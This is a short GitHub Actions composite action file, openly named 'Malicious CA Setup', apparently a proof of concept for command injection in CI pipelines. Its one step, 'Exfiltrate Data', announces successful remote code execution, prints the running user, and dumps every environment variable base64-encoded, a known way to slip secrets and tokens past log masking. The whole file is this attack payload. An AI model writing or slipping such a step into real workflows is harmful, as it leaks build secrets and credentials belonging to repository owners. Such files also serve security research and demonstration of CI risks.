name: 'Malicious CA Setup'
description: 'Injects a command'
runs:
  using: "composite"
  steps:
    - name: Exfiltrate Data
      shell: bash
      run: |
        echo "[+] RCE Successful! Running as user: $(whoami)"
        echo "[+] Environment variables (base64 encoded):"
        env | base64
